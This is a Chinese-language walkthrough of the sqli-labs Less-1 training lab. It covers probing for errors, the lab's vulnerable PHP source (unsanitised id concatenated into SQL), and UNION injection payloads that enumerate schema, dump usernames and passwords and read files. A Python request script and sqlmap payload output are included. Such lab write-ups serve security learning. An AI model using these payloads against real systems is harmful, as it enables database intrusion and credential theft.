sqli-lab-less1
一、靶标地址
#Less-1 **Error Based- String
#字符型基于报错的SQL注入
http://192.168.128.140/sqli/less-1/
二、漏洞探测
http://192.168.128.140/sqli/less-1/?id=1'
#报错
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,2' at line 1
#单引号里面的是报错的语句 '1'' LIMIT 0,2
#通过报错猜测后面的语句为 where id='$id' limit 0,2
http://192.168.128.140/sqli/less-1/?id=1"
#正常回显
#select * from users where id='1"' limit 0,1; //此语句正常回显
http://192.168.128.140/sqli/less-1/?id=1
#正常回显
#select * from users where id='1' limit 0,1;
三、源码分析
#lesson-1做最详细的分析
#index.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
##告知Web浏览器页面使用的HTML版本
<html xmlns="http://www.w3.org/1999/xhtml">
#xhtml命名空间,类似声明
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
//核心代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
#先执行该文件再接下来执行
error_reporting(0);
// take the variables
#isset() 函数用于检测变量是否已设置并且非 NULL。
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
#写入文本之中
fclose($fp);
// connectivity
#漏洞语句部分!!!
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
#mysql_query()函数执行一条MySQL查询。
$row = mysql_fetch_array($result);
#mysql_fetch_array()函数从结果集中取得一行(一般为第一行)作为数字数组或关联数组,返回的类型类似于字典
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
#<div>标签定义HTML文档中的一个分隔区块或者一个区域部分。
#</br>换行
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
四、黑盒与白盒测试
#白盒测试
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);#打印第一行,所以查询时第一行应为空所以为-1
$id = "-1' --+"
$sql="SELECT * FROM users WHERE id='-1' --+' LIMIT 0,1";
#黑盒测试
#判断当期数据表的列数
$id="-1' order by 3 --+"
#当期用户名和数据库名
$id="-1' union select 1,user(),database() --+"
#查询表名
$id="-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+"
#information_schema是MySQL特有数据库,tables是其中的一个表名,table_name是其中一个列名,包含了所有数据表.table_schema是数据库名。
#查询列名
$id="-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+"
#查询具体列数据
$id="-1' union select 1,2,group_concat(username) from users --+"
$id="-1' union select 1,2,group_concat(password) from users --+"
#读取文件
$id="-1' union select 1,2,load_file("C:\\flag.txt") --+"
#show global variables like '%secure%';
#secure_file_priv为空才可以读取
五、脚本撰写
import requests
url="http://192.168.128.140/sqli/less-1/index.php?id=-1"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload="'--+"
response=requests.get(url+payload,headers=header)
print(response.text)
#根据回显来确定
六、sqlmap
sqlmap -u http://192.168.128.140/sqli/less-1/index.php?id=1
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1921=1921 AND 'DyCe'='DyCe
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8164 FROM(SELECT COUNT(*),CONCAT(0x7178717671,(SELECT (ELT(8164=8164,1))),0x7162707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'btrk'='btrk
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4192 FROM (SELECT(SLEEP(5)))gNSF) AND 'TsEE'='TsEE
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5077' UNION ALL SELECT NULL,NULL,CONCAT(0x7178717671,0x4246496479524e454155766e4d464c766d59614f5741527569684b53414a74706c437850454f4741,0x7162707171)-- -
七、总结
1、less-1提交的参数是单引号括起来的。
2、需要熟练掌握漏洞点的利用方式。